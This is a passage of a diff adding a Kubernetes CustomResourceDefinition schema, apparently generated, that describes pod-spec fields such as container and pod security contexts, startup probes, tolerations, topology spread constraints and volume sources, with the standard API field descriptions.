object + securityContext: + description: 'SecurityContext defines the security options the container should be run with. If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false. + type: boolean + procMount: + description: procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this container. If seccomp options are provided at both the pod & container level, the container options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod has successfully initialized. If specified, no other probes are executed until this completes successfully. If this probe fails, the Pod will be restarted, just as if the livenessProbe failed. This can be used to provide different probe parameters at the beginning of a Pod''s lifecycle, when it might take a long time to load data or warm a cache, than during steady-state operation. This cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to which the container''s termination message will be written is mounted into the container''s filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block devices to be used by the container. + items: + description: volumeDevice describes a mapping of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside of the container that the device will be mapped to. + type: string + name: + description: name must match the name of a persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting of a Volume within a container. + properties: + mountPath: + description: Path within the container at which the volume should be mounted. Must not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10. + type: string + name: + description: This must match the Name of a Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false. + type: boolean + subPath: + description: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. + type: string + required: + - name + type: object + type: array + nodeName: + description: NodeName is a request to schedule this pod onto a specific node. If it is non-empty, the scheduler simply schedules this pod onto that node, assuming that it fits resource requirements. + type: string + nodeSelector: + additionalProperties: + type: string + description: 'NodeSelector is a selector which must be true for the pod to fit on a node. Selector which must match a node''s labels for the pod to be scheduled on that node. More info: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/' + type: object + x-kubernetes-map-type: atomic + overhead: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Overhead represents the resource overhead associated with running a pod for a given RuntimeClass. This field will be autopopulated at admission time by the RuntimeClass admission controller. If the RuntimeClass admission controller is enabled, overhead must not be set in Pod create requests. The RuntimeClass admission controller will reject Pod create requests which have the overhead already set. If RuntimeClass is configured and selected in the PodSpec, Overhead will be set to the value defined in the corresponding RuntimeClass, otherwise it will remain unset and treated as zero. More info: https://git.k8s.io/enhancements/keps/sig-node/688-pod-overhead/README.md This field is beta-level as of Kubernetes v1.18, and is only honored by servers that enable the PodOverhead feature.' + type: object + preemptionPolicy: + description: PreemptionPolicy is the Policy for preempting pods with lower priority. One of Never, PreemptLowerPriority. Defaults to PreemptLowerPriority if unset. This field is beta-level, gated by the NonPreemptingPriority feature-gate. + type: string + priority: + description: The priority value. Various system components use this field to find the priority of the pod. When Priority Admission Controller is enabled, it prevents users from setting this field. The admission controller populates this field from PriorityClassName. The higher the value, the higher the priority. + format: int32 + type: integer + priorityClassName: + description: If specified, indicates the pod's priority. "system-node-critical" and "system-cluster-critical" are two special keywords which indicate the highest priorities with the former being the highest priority. Any other name must be defined by creating a PriorityClass object with that name. If not specified, the pod priority will be default or zero if there is no default. + type: string + readinessGates: + description: 'If specified, all readiness gates will be evaluated for pod readiness. A pod is ready when all its containers are ready AND all conditions specified in the readiness gates have status equal to "True" More info: https://git.k8s.io/enhancements/keps/sig-network/580-pod-readiness-gates' + items: + description: PodReadinessGate contains the reference to a pod condition + properties: + conditionType: + description: ConditionType refers to a condition in the pod's condition list with matching type. + type: string + required: + - conditionType + type: object + type: array + restartPolicy: + description: 'Restart policy for all containers within the pod. One of Always, OnFailure, Never. Default to Always. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#restart-policy' + type: string + runtimeClassName: + description: 'RuntimeClassName refers to a RuntimeClass object in the node.k8s.io group, which should be used to run this pod. If no RuntimeClass resource matches the named class, the pod will not be run. If unset or empty, the "legacy" RuntimeClass will be used, which is an implicit class with an empty definition that uses the default runtime handler. More info: https://git.k8s.io/enhancements/keps/sig-node/585-runtime-class This is a beta feature as of Kubernetes v1.14.' + type: string + schedulerName: + description: If specified, the pod will be dispatched by specified scheduler. If not specified, the pod will be dispatched by default scheduler. + type: string + securityContext: + description: 'SecurityContext holds pod-level security attributes and common container settings. Optional: Defaults to empty. See type description for default values of each field.' + properties: + fsGroup: + description: "A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod: \n 1. The owning GID will be the FSGroup 2. The setgid bit is set (new files created in the volume will be owned by FSGroup) 3. The permission bits are OR'd with rw-rw---- \n If unset, the Kubelet will not modify the ownership and permissions of any volume." + format: int64 + type: integer + fsGroupChangePolicy: + description: 'fsGroupChangePolicy defines behavior of changing ownership and permission of the volume before being exposed inside Pod. This field will only apply to volume types which support fsGroup based ownership(and permissions). It will have no effect on ephemeral volume types such as: secret, configmaps and emptydir. Valid values are "OnRootMismatch" and "Always". If not specified, "Always" is used.' + type: string + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence for that container. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence for that container. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to all containers. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence for that container. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by the containers in this pod. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + supplementalGroups: + description: A list of groups applied to the first process run in each container, in addition to the container's primary GID. If unspecified, no groups will be added to any container. + items: + format: int64 + type: integer + type: array + sysctls: + description: Sysctls hold a list of namespaced sysctls used for the pod. Pods with unsupported sysctls (by the container runtime) might fail to launch. + items: + description: Sysctl defines a kernel parameter to be set + properties: + name: + description: Name of a property to set + type: string + value: + description: Value of a property to set + type: string + required: + - name + - value + type: object + type: array + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + serviceAccount: + description: 'DeprecatedServiceAccount is a depreciated alias for ServiceAccountName. Deprecated: Use serviceAccountName instead.' + type: string + serviceAccountName: + description: 'ServiceAccountName is the name of the ServiceAccount to use to run this pod. More info: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/' + type: string + setHostnameAsFQDN: + description: If true the pod's hostname will be configured as the pod's FQDN, rather than the leaf name (the default). In Linux containers, this means setting the FQDN in the hostname field of the kernel (the nodename field of struct utsname). In Windows containers, this means setting the registry value of hostname for the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters to FQDN. If a pod does not have FQDN, this has no effect. Default to false. + type: boolean + shareProcessNamespace: + description: 'Share a single process namespace between all of the containers in a pod. When this is set containers will be able to view and signal processes from other containers in the same pod, and the first process in each container will not be assigned PID 1. HostPID and ShareProcessNamespace cannot both be set. Optional: Default to false.' + type: boolean + subdomain: + description: If specified, the fully qualified Pod hostname will be "...svc.". If not specified, the pod will not have a domainname at all. + type: string + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully. May be decreased in delete request. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). If this value is nil, the default grace period will be used instead. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. Defaults to 30 seconds. + format: int64 + type: integer + tolerations: + description: If specified, the pod's tolerations. + items: + description: The pod this Toleration is attached to tolerates any taint that matches the triple using the matching operator . + properties: + effect: + description: Effect indicates the taint effect to match. Empty means match all taint effects. When specified, allowed values are NoSchedule, PreferNoSchedule and NoExecute. + type: string + key: + description: Key is the taint key that the toleration applies to. Empty means match all taint keys. If the key is empty, operator must be Exists; this combination means to match all values and all keys. + type: string + operator: + description: Operator represents a key's relationship to the value. Valid operators are Exists and Equal. Defaults to Equal. Exists is equivalent to wildcard for value, so that a pod can tolerate all taints of a particular category. + type: string + tolerationSeconds: + description: TolerationSeconds represents the period of time the toleration (which must be of effect NoExecute, otherwise this field is ignored) tolerates the taint. By default, it is not set, which means tolerate the taint forever (do not evict). Zero and negative values will be treated as 0 (evict immediately) by the system. + format: int64 + type: integer + value: + description: Value is the taint value the toleration matches to. If the operator is Exists, the value should be empty, otherwise just a regular string. + type: string + type: object + type: array + topologySpreadConstraints: + description: TopologySpreadConstraints describes how a group of pods ought to spread across topology domains. Scheduler will schedule pods in a way which abides by the constraints. All topologySpreadConstraints are ANDed. + items: + description: TopologySpreadConstraint specifies how to spread matching pods among the given topology. + properties: + labelSelector: + description: LabelSelector is used to find matching pods. Pods that match this label selector are counted to determine the number of pods in their corresponding topology domain. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + maxSkew: + description: 'MaxSkew describes the degree to which pods may be unevenly distributed. When `whenUnsatisfiable=DoNotSchedule`, it is the maximum permitted difference between the number of matching pods in the target topology and the global minimum. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 1/1/0: | zone1 | zone2 | zone3 | | P | P | | - if MaxSkew is 1, incoming pod can only be scheduled to zone3 to become 1/1/1; scheduling it onto zone1(zone2) would make the ActualSkew(2-0) on zone1(zone2) violate MaxSkew(1). - if MaxSkew is 2, incoming pod can be scheduled onto any zone. When `whenUnsatisfiable=ScheduleAnyway`, it is used to give higher precedence to topologies that satisfy it. It''s a required field. Default value is 1 and 0 is not allowed.' + format: int32 + type: integer + topologyKey: + description: TopologyKey is the key of node labels. Nodes that have a label with this key and identical values are considered to be in the same topology. We consider each as a "bucket", and try to put balanced number of pods into each bucket. It's a required field. + type: string + whenUnsatisfiable: + description: 'WhenUnsatisfiable indicates how to deal with a pod if it doesn''t satisfy the spread constraint. - DoNotSchedule (default) tells the scheduler not to schedule it. - ScheduleAnyway tells the scheduler to schedule the pod in any location, but giving higher precedence to topologies that would help reduce the skew. A constraint is considered "Unsatisfiable" for an incoming pod if and only if every possible node assigment for that pod would violate "MaxSkew" on some topology. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | If WhenUnsatisfiable is set to DoNotSchedule, incoming pod can only be scheduled to zone2(zone3) to become 3/2/1(3/1/2) as ActualSkew(2-1) on zone2(zone3) satisfies MaxSkew(1). In other words, the cluster can still be imbalanced, but scheduler won''t make it *more* imbalanced. It''s a required field.' + type: string + required: + - maxSkew + - topologyKey + - whenUnsatisfiable + type: object + type: array + x-kubernetes-list-map-keys: + - topologyKey + - whenUnsatisfiable + x-kubernetes-list-type: map + volumes: + description: 'List of volumes that can be mounted by containers belonging to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes' + items: + description: Volume represents a named volume in a pod that may be accessed by any container in the pod. + properties: + awsElasticBlockStore: + description: 'AWSElasticBlockStore represents an AWS Disk resource that is attached to a kubelet''s host machine and then exposed to the pod. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + properties: + fsType: + description: 'Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore TODO: how do we prevent errors in the filesystem from compromising the machine' + type: string + partition: + description: 'The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as "1". Similarly, the volume partition for /dev/sda is "0" (or you can leave the property empty).' + format: int32 + type: integer + readOnly: + description: 'Specify "true" to force and set the ReadOnly property in VolumeMounts to "true". If omitted, the default is "false". More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: boolean + volumeID: + description: 'Unique ID of the persistent disk resource in AWS (Amazon EBS volume). More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore' + type: string + required: + - volumeID + type: object + azureDisk: + description: AzureDisk represents an Azure Data Disk mount on the host and bind mount to the pod. + properties: + cachingMode: + description: 'Host Caching mode: None, Read Only, Read Write.' + type: string + diskName: + description: The Name of the data disk in the blob storage + type: string + diskURI: + description: The URI the data disk in the blob storage + type: string + fsType: + description: Filesystem type to mount. Must be a filesystem type supported by the host operating system. Ex. "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. + type: string + kind: + description: 'Expected values Shared: multiple blob disks per storage account Dedicated: single blob disk per storage account Managed: azure managed data disk (only in managed availability set). defaults to shared' + type: string + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + required: + - diskName + - diskURI + type: object + azureFile: + description: AzureFile represents an Azure File Service mount on the host and bind mount to the pod. + properties: + readOnly: + description: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. + type: boolean + secretName: + description: the name of secret that contains Azure Storage Account Name and Key + type: string + shareName: + description: Share Name + type: string + required: + - secretName + - shareName + type: object + cephfs: + description: CephFS represents a Ceph FS mount on the host that shares a pod's lifetime + properties: + monitors: + description: 'Required: Monitors is a collection of Ceph monitors More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + items: + type: string + type: array + path: + description: 'Optional: Used as the mounted root, rather than the full Ceph tree, default is /' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: boolean + secretFile: + description: 'Optional: SecretFile is the path to key ring for User, default is /etc/ceph/user.secret More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + secretRef: + description: 'Optional: SecretRef is reference to the authentication secret for User, default is empty. More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + user: + description: 'Optional: User is the rados user name, default is admin More info: https://examples.k8s.io/volumes/cephfs/README.md#how-to-use-it' + type: string + required: + - monitors + type: object + cinder: + description: 'Cinder represents a cinder volume attached and mounted on kubelets host machine. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + properties: + fsType: + description: 'Filesystem type to mount. Must be a filesystem type supported by the host operating system. Examples: "ext4", "xfs", "ntfs". Implicitly inferred to be "ext4" if unspecified. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + readOnly: + description: 'Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: boolean + secretRef: + description: 'Optional: points to a secret object containing parameters used to connect to OpenStack.' + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + volumeID: + description: 'volume id used to identify the volume in cinder. More info: https://examples.k8s.io/mysql-cinder-pd/README.md' + type: string + required: + - volumeID + type: object + configMap: + description: ConfigMap represents a configMap that should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Defaults to 0644. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + items: + description: If unspecified, each key-value pair in the Data field of the referenced ConfigMap will be projected into the volume as a file whose name is the key and content is the value. If specified, the listed keys will be projected into the specified paths, and unlisted keys will not be present. If a key is specified which is not present in the ConfigMap, the volume setup will error unless it is marked optional. Paths must be relative and may not contain the '..' path or start with '..'. + items: + description: Maps a string key to a path within a volume. + properties: + key: + description: The key to project. + type: string + mode: + description: 'Optional: mode bits used to set permissions on this file. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: The relative path of the file to map the key to. May not be an absolute path. May not contain the path element '..'. May not start with the string '..'. + type: string + required: + - key + - path + type: object + type: array + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its keys must be defined + type: boolean + type: object + csi: + description: CSI (Container Storage Interface) represents ephemeral storage that is handled by certain external CSI drivers (Beta feature). + properties: + driver: + description: Driver is the name of the CSI driver that handles this volume. Consult with your admin for the correct name as registered in the cluster. + type: string + fsType: + description: Filesystem type to mount. Ex. "ext4", "xfs", "ntfs". If not provided, the empty value is passed to the associated CSI driver which will determine the default filesystem to apply. + type: string + nodePublishSecretRef: + description: NodePublishSecretRef is a reference to the secret object containing sensitive information to pass to the CSI driver to complete the CSI NodePublishVolume and NodeUnpublishVolume calls. This field is optional, and may be empty if no secret is required. If the secret object contains more than one secret, all secret references are passed. + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + type: object + readOnly: + description: Specifies a read-only configuration for the volume. Defaults to false (read/write). + type: boolean + volumeAttributes: + additionalProperties: + type: string + description: VolumeAttributes stores driver-specific properties that are passed to the CSI driver. Consult your driver's documentation for supported values. + type: object + required: + - driver + type: object + downwardAPI: + description: DownwardAPI represents downward API about the pod that should populate this volume + properties: + defaultMode: + description: 'Optional: mode bits to use on created files by default. Must be a Optional: mode bits used to set permissions on created files by default. Must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. Defaults to 0644. Directories within the path are not affected by this setting. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + items: + description: Items is a list of downward API volume file + items: + description: DownwardAPIVolumeFile represents information to create the file containing the pod field + properties: + fieldRef: + description: 'Required: Selects a field of the pod: only annotations, labels, name and namespace are supported.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + mode: + description: 'Optional: mode bits used to set permissions on this file, must be an octal value between 0000 and 0777 or a decimal value between 0 and 511. YAML accepts both octal and decimal values, JSON requires decimal values for mode bits. If not specified, the volume defaultMode will be used. This might be in conflict with other options that affect the file mode, like fsGroup, and the result can be other mode bits set.' + format: int32 + type: integer + path: + description: 'Required: Path is the relative path name of the file to be created. Must not be absolute or contain the ''..'' path. Must be utf-8 encoded. The first item of the relative path must not start with ''..''' + type: string + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, requests.cpu and requests.memory) are currently supported.' + properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - 